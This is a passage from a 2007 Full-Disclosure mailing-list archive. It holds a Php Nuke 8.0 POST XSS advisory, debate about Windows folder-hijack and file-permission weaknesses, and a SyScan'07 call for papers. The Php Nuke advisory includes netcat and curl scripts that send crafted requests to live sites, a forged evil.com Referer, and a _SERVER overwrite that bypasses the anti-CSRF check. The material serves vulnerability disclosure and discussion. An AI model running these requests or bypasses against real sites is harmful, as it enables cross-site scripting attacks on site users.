creator-owner based permissions in MB> replicated folders. MB> Again, [1] seriously escalates this problem. MB> 2. Conclusion: MB> It's simply impossible to securely create something in public folder. MB> At least DoS conditions are always possible. MB> Developers should not consider mandatory file locking as a security MB> feature. MB> Developers should care about secure file creation to store sensitive MB> information. CREATE_NEW should always be used and ACL should be set MB> with lpSecurityAttributes of CreateFile. No attempt to open existing MB> file should be made. MB> Never try to create secure folder in public one. If you are forced, MB> disconnect all users before this operation. MB> Never use replication, archive extraction or backup restore to MB> user-accessible folder. MB> Bob and Alice should finally marry. MB> 3. Vendor: MB> All timelines are same with [1]. MB> [1]. Microsoft Windows ReadDirectoryChangesW information leak MB> (CVE-2007-0843) MB> http://security.nnov.ru/news/Microsoft/Windows/ReadDirector.html MB> [2]. Windows 2000 system partition weak default permissions MB> http://securityvulns.ru/news2205.html MB> http://winblogs.security-feeds.com -- ~/ZARAZA http://securityvulns.com/ ????????? ??????????! ??? ?? ??? ?????????? ?????. (????) From ascii at katamail.com Fri Mar 9 16:30:29 2007 From: ascii at katamail.com (ascii) Date: Fri, 09 Mar 2007 17:30:29 +0100 Subject: [Full-disclosure] Php Nuke POST XSS on steroids Message-ID: <45F18BA5.50500@katamail.com> Php Nuke POST XSS on steroids Name Php Nuke POST XSS on steroids Systems Affected PHP >=4.0.7 <=5.2.1, GLOBALS OFF, Php Nuke 8.0 and others (partially verified) Severity Medium Vendor http://php nuke.org/ Advisory http://www.ush.it/2007/03/09/php-nuke-wild-post-xss/ Authors Francesco `ascii` Ongaro (ascii at ush.it) Stefano `wisec` di Paola (stefano.dipaola at wisec.it) Date 20070307 I. BACKGROUND Php Nuke is a CMS written in PHP. This advisory is just an example on how to exploit an XSS on platforms that use anti CSRF techniques with the import_request_variables() bypass. II. DESCRIPTION An XSS vulnerability exists in the handling of the query post variable in the Search function of the Downloads module. This is exploitable in special conditions; you need: - PHP >=4.0.7 <=5.2.1 to use the import_request_variables() trick - register_globals off (doesn't work with globals on) - Php Nuke 8 and others III. ANALYSIS Php Nuke 8.0 is vulnerable to an XSS on _POST, you can verify this using the provided testsuite. --- >8 --- >8 --- >8 --- >8 --- testsuite.sh --- >8 --- >8 --- >8 --- >8 #!/bin/bash cat > REQ << TOKEN POST /modules.php?name=Downloads&d_op=search&query= HTTP/1.1 Host: www.phpnuke.org User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Connection: close Referer: http://www.phpnuke.org/modules.php?name=Downloads Cookie: lang=english Content-Type: application/x-www-form-urlencoded Content-Length: 23 query=token<>token TOKEN cat REQ | nc www.phpnuke.org 80 -vvv --- >8 --- >8 --- >8 --- >8 --- ------------ --- >8 --- >8 --- >8 --- >8 $ ./testcase | grep "token<>token" DNS fwd/rev mismatch: www.phpnuke.org != ev1s-67-15-16-43.ev1servers.net www.phpnuke.org [67.15.16.43] 80 (http) open
token" method="post"> When you will try to apply CSRF to this bug (eg. you need a gateway page to send the post query) you'll notice that Php Nuke has a generic piece of code in mainfile.php that prevents posting with a "wrong" referrer. Test this with the following two testsuites: --- >8 --- >8 --- >8 --- >8 --- testsuit1.sh --- >8 --- >8 --- >8 --- >8 #!/bin/bash cat > REQ << TOKEN POST /modules.php?name=Downloads&d_op=search&query= HTTP/1.1 Host: www.phpnuke.org User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Connection: close Referer: http://www.phpnuke.org/modules.php?name=Downloads Cookie: lang=english Content-Type: application/x-www-form-urlencoded Content-Length: 55 query="> TOKEN cat REQ | nc www.phpnuke.org 80 -vvv --- >8 --- >8 --- >8 --- >8 --- testsuit2.sh --- >8 --- >8 --- >8 --- >8 #!/bin/bash cat > REQ << TOKEN POST /modules.php?name=Downloads&d_op=search&query= HTTP/1.1 Host: www.phpnuke.org User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Connection: close Referer: http://www.evil.com/ Cookie: lang=english Content-Type: application/x-www-form-urlencoded Content-Length: 55 query="> TOKEN cat REQ | nc www.phpnuke.org 80 -vvv --- >8 --- >8 --- >8 --- >8 --- ------------ --- >8 --- >8 --- >8 --- >8 In the first case the attack will succeed cause the referrer matches, in the second the anti-off-domain-post-check will block your attempt and you'll get a message like: Posting from another server not allowed! It seems that other versions have this check too. --- >8 --- >8 --- >8 --- >8 --- ------------ --- >8 --- >8 --- >8 --- >8 for i in `cat urls.txt`; do echo $i; curl -s "http://$1/modules.php?name=Downloads&d_op=search" \ -d 'query=asd&query="token<"' \ -e "www.tin.it" -H "User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061208 Firefox/2.0.0.1"; done; echo http://XXXXopic.it/ Posting from another server not allowed! http://XXXXnuke.org/ Posting from another server not allowed! http://XXXXir.it/ Posting from another server not allowed! http://XXXXesi.it/ Posting from another server not allowed! http://XXXXoft.it/ Posting from another server not allowed! --- >8 --- >8 --- >8 --- >8 --- ------------ --- >8 --- >8 --- >8 --- >8 The initial part of mainfile.php can be synthesized as following: --- >8 --- >8 --- >8 --- >8 --- ------------ --- >8 --- >8 --- >8 --- >8 // get php version $phpver = phpversion(); // convert superglobals if php is lower then 4.1.0 if ($phpver < '4.1.0') { [..cut..] } // override old superglobals if php is higher then 4.1.0 if($phpver >= '4.1.0') { [..cut..] } if (!ini_get('register_globals')) { @import_request_variables("GPC", ""); } [..] // Posting from other servers in not allowed if ($_SERVER['REQUEST_METHOD'] == "POST") { if (isset($_SERVER['HTTP_REFERER'])) { if (!stripos_clone($_SERVER['HTTP_REFERER'], $_SERVER['HTTP_HOST'])) die('Posting from another server not allowed!'); } else die($posttags); } --- >8 --- >8 --- >8 --- >8 --- ------------ --- >8 --- >8 --- >8 --- >8 So if globals are off using the import_request_variables() trick we can overwrite the _SERVER array and bypass the check (yes, you can do a lot of other things too, this is just an example). Use this code to replicate the issue: --- >8 --- >8 --- >8 --- >8 --- poc.sh --- >8 --- >8 --- >8 --- >8 #!/bin/bash cat > testsuite.php << TOKEN TOKEN --- >8 --- >8 --- >8 --- >8 --- ------ --- >8 --- >8 --- >8 --- >8 $ curl "http://XXXX/hack-phpnuke8/testsuite.php" GLOBALS 0 IM THE PAGE! $ curl "http://XXXX/hack-phpnuke8/testsuite.php" -d "ima=post" GLOBALS 0 No referer! $ curl "http://XXXX/hack-phpnuke8/testsuite.php" -d "ima=post" \ -e "www.tin.it" GLOBALS 0 Posting from another server not allowed! $ curl "http://ascii.asciinb.vlan.ush.it/hack-phpnuke8/testsuite.php" \ -d "ima=post&_SERVER=evil" -e "www.tin.it" GLOBALS 0 IM THE PAGE! Doesn't this seems cyclic to you? stripos will return TRUE if the array element doesn't exists. IV. DETECTION Php Nuke 8.0 and others are affected, please test with the supplied testsuites. You can download Php Nuke from here : ) https://secure.bmtmicro.com/servlets/Orders.ShoppingCart?CID=4&PRODUCTID=19850011 V. WORKAROUND Turn globals on. VI. VENDOR RESPONSE Will fix, probably. VII. CVE INFORMATION No CVE at this time. VIII. DISCLOSURE TIMELINE 20070307 Discovery 20070308 What do you expect here? 20070309 Full disclosure IX. CREDIT Francesco 'ascii' Ongaro is credited with the discovery of this vulnerability. X. LEGAL NOTICES Copyright (c) 2007 Francesco 'ascii' Ongaro Note: this exploit is DOUBLE LICENSED: 1. If you'll use it for personal and non-profit purposes you can apply GPL v2 and above. 2. In the case you plain to: a. use our code in any commercial context b. implement this code in your non-GPL application c. use this code during a Penetration Test d. make any profit from it you need to contact me in order to obtain a _commercial license_. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without my express written consense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email me for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. Regards, Francesco `ascii` Ongaro http://www.ush.it/ From hackbunny at reactos.com Fri Mar 9 02:15:50 2007 From: hackbunny at reactos.com (KJKHyperion) Date: Fri, 09 Mar 2007 03:15:50 +0100 Subject: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 file management security issues In-Reply-To: <20070308203157.7972F1D8F32@supertolla.itapac.net> References: <20070308203157.7972F1D8F32@supertolla.itapac.net> Message-ID: <45F0C356.6020703@reactos.com> 3APA3A wrote: > 2. Conclusion: [...] hahaha. Seriously, the Windows security model is great and everything, but it has never been used consistently, _never_. It's an uphill battle Take privileges for example: 64-bit namespace and barely above a dozen have been defined; two were overloaded and one recycled; and still no way to create arbitrary privileges. So to implement capability checks you perform group membership checks or make creative use of ACLs. Or take default device security. Or how sandboxing inexplicably breaks SSPI, making it close to useless. Or the countless hard-coded ACLs that make the complexity of the whole thing so unjustified you wonder why don't they just go with an "is administrator" bit. Or the total coolness that is Safer, truly a few hooks short of a filesystem firewall, and how criminally underused it is Then there's the compatibility issues. PGP Desktop breaks sandboxing rather spectacularly (silent crashes in all sandboxed applications) because when its hook cannot open the shared memory object (created with whatever default ACL was specified for the PGPTray.exe process) it just tries to access the NULL pointer returned. Sandboxing breaks the language bar - shared memory woes again. It has the common decency of not crashing or worse, it just sorta limps along a little. And the funny thing is, there _is_ a standard, documented way to perform access checks compatible with GUI security boundaries (it's not explicitely documented as such, but hey, we all come with a brain): all processes in interactive sessions receive a special group ("logon id") whose membership grants access to the display. It should be a _given_ for GUI hooks to use this mechanism, more so for GUI hooks developed by Microsoft - but the language bar developers amply proved to be a bunch of fucking cowboys anyway, and to Microsoft's credit they got it totally wrong in the Windows 2000 version of runas, but fixed it for Windows XP A long time ago I tried to advocate making all files in one's own user profile non-executable by default, as a basic protection measure, and like all the ideas I try to push, I dogfooded it extensively. It subtly breaks a lot of innocent programs. Other than completely isolating users, you cannot get any realistic form of security. Isolating users from each other and from administrators is the only scenario that has consistently been implemented and recognized. The rest is a wasteland of abandoned technology and wishful thinking The problem you describe? it has a 1-bit fix, SE_DACL_PROTECTED. All files would be created by default with full access to owner and SYSTEM. You can have fat lots of fun trying to figure out what will break and how. A real solution would involve new DACL/SACL entries for directories that enforce "acceptable" security descriptors on the files contained therein. The same could work in the default DACL/SACL for tokens, enforcing policies for *all* objects created by that subject (yes, I put way too much thought in this. I am just gay for the Windows security model. You can't not love a model where a subject might not belong to the "world" group) (ReadDirectoryChangesW on the other hand *is* a vulnerability, as it gives traverse *and* list acces but only requests traverse) From organiser at syscan.org Fri Mar 9 04:23:10 2007 From: organiser at syscan.org (organiser at syscan.org) Date: Fri, 09 Mar 2007 12:23:10 +0800 Subject: [Full-disclosure] SyScan'07 - Call for Paper - NEW UPDATES Message-ID: <45F0E12E.2070605@syscan.org> dear all here are some updates to the SyScan'07 call for paper: 1. new topic. The following topics will be included: a. Web 2.0 - web services, PHP, .Net, web applications 2. Speakers' Privileges. a. Speakers at SyScan'07 with a brand new presentation will receive S$500 cash. b. Selected speakers will get a chance to present at conferences either in Korea or India. ************************************************************************************************************************** *CALL FOR PAPER/TRAINING* *ABOUT SYSCAN'07* The Symposium on Security for Asia Network (SyScan) aims to be a very different security conference from the rest of the security conferences that the information security community in Asia has come to be so familiar and frustrated with. SyScan intends to be a non-product, non-vendor biased security conference. It is the aspiration of SyScan to congregate, in Singapore, the best security experts in their various fields, to share their research, discovery and experience with all security enthusiasts in Asia. Besides main the conference, there will also be specialized security training courses in SyScan'07. These classes will be held before the main conference. SyScan'07 will be held in Singapore over at the Swissotel Merchant Court Hotel. The main conference will be held on 5th and 6th of July and the training will be held on 3^rd and 4^th of July, 2007. *CFP Committee* The Call for Paper committee for SyScan'07 comprises of the following personnel: 1. Thomas Lim - Organiser of SyScan and CEO of COSEINC 2. Dave Aitel - Founder of Immunitysec 3. Marc Maiffret - Founder and Chief Hacking Officer of eEye 4. Matthew "Shok" Conover - Symantec 5. Ong Geok Meng - McAfee The CFP committee will review all submissions and determine the final list of speakers for SyScan'07. *Speakers* *Speakers' Privileges:* * Return economy class air-ticket for one person. * 3 nights of accommodation. * Breakfast, lunch and dinner during conference. * After-conference party. * A very healthy dose of alcohol and fun. * S$500 cash for speakers with brand new presentation. * Selected speakers will get a chance to present in Korea and India at the end of the year. *Topics* The focus for SyScan'07 will include the following: */Operating Systems/* * Vista * Linux */Mobile Devices/Embedded systems/* * SmartPhones * PDAs * Game Consoles */Networking/Telecommunication/* * VoIP * 3G/3.5G network * IPv6 * WLAN/WiFi * GPRS */Industry specific/* * Banking and Financial Services sectors */Malware/* */BotNets/* /*/Web 2.0/* * Web services * PHP * .Net * Web applications / Any topics that will catch the attention of the CFP committee and/or the world. *TRAINERS* *Trainers' Privileges:* * 50% of net profit of class. * 2 nights of accommodation (conference). * After-conference party. * A very healthy dose of alcohol and fun. Please note that the net profit for each class is determined by the difference between the total fee collected for each class and the total expenses incurred for each class. The expenses of each class would include the return economy air-ticket of the trainer, 3 nights of accommodation (training) and the rental of the training venue. *Topics* SyScan'07 training topics will focus on the following areas: Web Applications * .Net applications * Java applications Networks * VoIP * 3G/3.5G network * IPv6 * WLAN/WiFi * GPRS Databases Storage *CFP Submission:* CFP submission must include the following information: 1) Brief biography including list of publications and papers published previously or training classes conducted previously. 2) Proposed presentation/training title, category, synopsis and description. 3) Contact Information (full name, alias, handler, e-mail, postal address, phone, fax, photo, country of origin, special dietary requirement). 4) Employment and/or affiliations information. 5) Any significant presentation and educational/training experience/background. 6) Why is your material different or innovative or significant or an important tutorial? Please note that all speakers will be allocated 50 minutes of presentation time. Any speakers that require more time must inform the CFP committee during the CFP submission. Rraining class will be 2 full days. Please inform the CFP committee if your class is shorter or longer than 2 days during your CFP submission. All submission must be in English in either MS Office or PDF format. The more information you provide, the better the chance for selection. Please send submission to cfp at syscan.org . Submission for trainers must be done no later than 30th March 2007. Submission for speakers must be done no later than 30th April 2007. *Important Dates* Final CFP Submission (Trainers) - 30th March 2007 Final CFP Submission (Speakers) - 30th April 2007 Notification of Acceptance (Trainers) - 15th April 2007. Notification of Acceptance (Speakers) - 15th May 2007 Final Accepted Presentation Material Submission (Speakers) - 5th June 2007 *OTHER INFORMATION* Please feel free to visit SyScan website to get a feel what this conference is all about - SHARE AND HAVE FUN! By agreeing to speak at the SyScan'07 you are granting SyScan Pte. Ltd. the rights to reproduce, distribute, advertise and show your presentation including but not limited to http://www.syscan.org, printed and/or electronic advertisements, and other form of mediums. -- Thank you Thomas Lim Organiser SyScan'07 www.syscan.org From roger at banneretcs.com Fri Mar 9 04:31:54 2007 From: roger at banneretcs.com (Roger A. Grimes) Date: Thu, 8 Mar 2007 23:31:54 -0500 Subject: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 file management security issues In-Reply-To: <1199291182.20070308225837@SECURITY.NNOV.RU> References: <1199291182.20070308225837@SECURITY.NNOV.RU> Message-ID: <096A04F511B7FD4995AE55F13824B8332127F5@banneretcs1.local.banneretcs.com> I'm missing something here. In order for Alice to Take Ownership of Bob's private folder she would have to have Full Control in the parent Public folder or Bob's child folder, not just the Write/Modify permission. If Alice deletes Bob's folder (which she could do in some scenarios because she has the write/modify permission) and re-creates it, she becomes the Creator Owner and now Bob no longer has the ability to set permissions on it. If I take your strange assumptions, Bob could re-discover the newly created folder that Alice made, just like she did (I mean if you make up crap scenarios, why can't I), and do the same trick back to her. And Windows does have a umask-like function. It's called Creator Owner. It's a well known SID, and the default permissions for it can be set so that any granular permission you want can be set to be default. Vista does have symbolic links, and Windows has supported Junction Points (similar to symbolic links) since Windows 2000. The main difference is that Junction Points could only point to local resources and symbolic links can do remote resources as well. You've come up with some strange scenarios below, and in all cases I could easily defeat the problem you are suggesting by using basic, recommended, security settings. Why do you spend your time coming up with such weird scenarios to focus on? You're obviously a creative guy with some Windows security smarts. Why not focus on more realistic scenarios with more real-world use? There's plenty of them for us to focus on and to try and solve. Roger ***************************************************************** *Roger A. Grimes, InfoWorld, Security Columnist *CPA, CISSP, MCSE: Security (2000/2003/MVP), CEH, yada...yada... *email: roger_grimes at infoworld.com or roger at banneretcs.com *Author of Professional Windows Desktop and Server Hardening (Wrox) *http://www.amazon.com/gp/product/0764599909 ***************************************************************** -----Original Message----- From: 3APA3A [mailto:3APA3A at SECURITY.NNOV.RU] Sent: Thursday, March 08, 2007 2:59 PM To: bugtraq at securityfocus.com; full-disclosure at lists.grok.org.uk Subject: Microsoft Windows Vista/2003/XP/2000 file management security issues This is an article I promised to publish after Windows ReadDirectoryChangesW (CVE-2007-0843) [1] issue. It should explain why you must never place secure data inside insecure directory. Title: Microsoft Windows Vista/2003/XP/2000 file management security issues Author: 3APA3A, http://securityvulns.com/ Vendor: Microsoft (and potentially another vendors) Products: Microsoft Windows Vista/2003/XP/2000, Microsoft resource kit for Windows 2000 and different utilities. Access Vector: Local Type: multiple/complex (weak design, insecure file operations, etc) Original advisory: http://securityvulns.com/advisories/winfiles.asp Securityvulns.com news: http://security.nnov.ru/news/Microsoft/Windows/files.html 0. Intro This article contains a set of attack scenarios to demonstrate security weakness in few very common Windows management practices. Neither of the problem explained is critical, yet combined together they should force you to review your security practices. I can't even say "vulnerabilities" because there is no something you can call "vulnerability". It's just something you believe is secure and it's not. 1.1 Problem: inability to create secured file / folder in public one. Attack: folder hijack attack First, it's simply impossible with standard Windows interface to create something secured in insecure folder. Scenario 1.1: Bob wishes to create "Bob private data" folder in "Public" folder to place few private files. "Public" has at least "Write" permissions for "User" group. Bob: I Creates "Bob private data" folder II Sets permission for folder to only allow access to folder himself III Copies private files into folder Alice wants to get access to folder Bob created. She Ia Immediately after folder is created, deletes "Bob private data" folder and creates "Bob private data" folder again (or simply takes ownership under "Bob private data" folder if permissions allow). It makes Alice folder owner. IIa Immediately after Bob sets permissions, she grants herself full control under folder. She can do it as a folder owner. IIIa Reads Bob's private files, because files permissions are inherited from folder Alice can use "Spydir" (http://securityvulns.com/soft/) tool to monitor files access and automate this process. As you can see, [1] elevates this problem significantly. This is not new attack. Unix has "umask" command to protect administrators and users. Currently, Windows has nothing similar. CreateFile() API supports setting file ACL on file creation (just like open() allows to set mode on POSIX systems). ACL can be securely set only on newly created files. This raises a problem of secure file creation. 1.2 Problem: Inability to lock / securely change permissions of already created file Attack: pre-open file/directory attack. There are few classes of insecure file creation attack (attempt to open existing file), exploitable under Unix